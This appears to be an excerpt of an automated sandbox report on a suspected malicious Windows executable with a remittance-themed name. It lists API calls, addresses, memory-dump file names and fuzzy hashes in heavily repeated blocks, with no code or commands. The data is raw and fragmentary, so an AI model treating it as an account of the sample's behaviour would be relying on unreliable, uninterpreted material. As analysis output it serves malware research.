                                                                      • _wcslen.LIBCMT ref: 004438CD
                                                                      • _wcslen.LIBCMT ref: 004438E6
                                                                      • _wcstok.LIBCMT ref: 004438F8
                                                                      • _wcslen.LIBCMT ref: 0044390C
                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                      • _wcstok.LIBCMT ref: 00443931
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 3632110297-0
                                                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 752480666-0
                                                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                      • String ID:
                                                                      • API String ID: 3275902921-0
                                                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                      • String ID:
                                                                      • API String ID: 3275902921-0
                                                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                      APIs
                                                                      • SendMessageW.USER32 ref: 004555C7
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 3691411573-0
                                                                      • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                      • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                      • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                      • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                      • EndPath.GDI32(?), ref: 004472D6
                                                                      • StrokePath.GDI32(?), ref: 004472E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                      • String ID:
                                                                      • API String ID: 372113273-0
                                                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 0041708E
                                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                      • __amsg_exit.LIBCMT ref: 004170AE
                                                                      • __lock.LIBCMT ref: 004170BE
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                      • _free.LIBCMT ref: 004170EE
                                                                      • InterlockedIncrement.KERNEL32(009B2D28), ref: 00417106
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 3470314060-0
                                                                      • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                      • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                      • String ID:
                                                                      • API String ID: 442100245-0
                                                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                      • _wcslen.LIBCMT ref: 0045F94A
                                                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 621800784-4108050209
                                                                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
